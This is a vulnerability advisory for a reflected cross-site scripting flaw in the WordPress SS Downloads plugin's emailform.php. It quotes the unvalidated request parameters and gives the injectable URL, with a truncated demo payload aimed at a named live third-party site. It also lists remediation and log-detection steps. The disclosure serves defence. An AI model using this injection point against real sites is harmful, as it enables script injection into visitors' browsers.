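######################
# Exploit Title : WordPress SS Downloads Plugin Cross Site Scripting
# Exploit Author : ACC3SS
# Vendor Homepage : http://wordpress.org/plugins/ss-downloads/developers/
# Software Link : http://downloads.wordpress.org/plugin/ss-downloads.1.4.4.1.zip
# Date : 2014-01-19
# Tested on : Windows 7 / Mozilla Firefox Web Browser
# Discovered by : ACC3SS
######################
# Vulnerability code : emailform.php
#
#   $file   = $_REQUEST['file'];
#   $title  = $_REQUEST['title'];
#   $postid = $_REQUEST['postid'];
#
# Root cause : all three values are read straight from $_REQUEST with no
# validation. The report implies they are then written into the form's HTML
# without output escaping, so markup supplied in a parameter is reflected back
# to the browser (reflected XSS). Only `file` is demonstrated below; `title`
# and `postid` are read the same way and should be treated as equally exposed
# until the output code is checked.
######################
# Location : localhost/wp-content/plugins/ss-downloads/templates/emailform.php?file=[Xss]
#
# The template is requested directly under wp-content/plugins/, so the request
# does not pass through WordPress routing or any login check.
######################
# Demo :
# http://aquarts.de/wp-content/plugins/ss-downloads/templates/emailform.php?file= "/>
######################
# Remediation : escape every value at the point of output (esc_attr() inside
# attributes, esc_html() in element content), cast `postid` with absint(), and
# sanitize `file` and `title` on input (e.g. sanitize_text_field()). If the
# template is not meant to be requested directly, make it exit when ABSPATH is
# not defined.
# Detection : review web server logs for requests to
# /wp-content/plugins/ss-downloads/templates/emailform.php whose `file`,
# `title` or `postid` values contain quotes or angle brackets, raw or
# URL-encoded.
######################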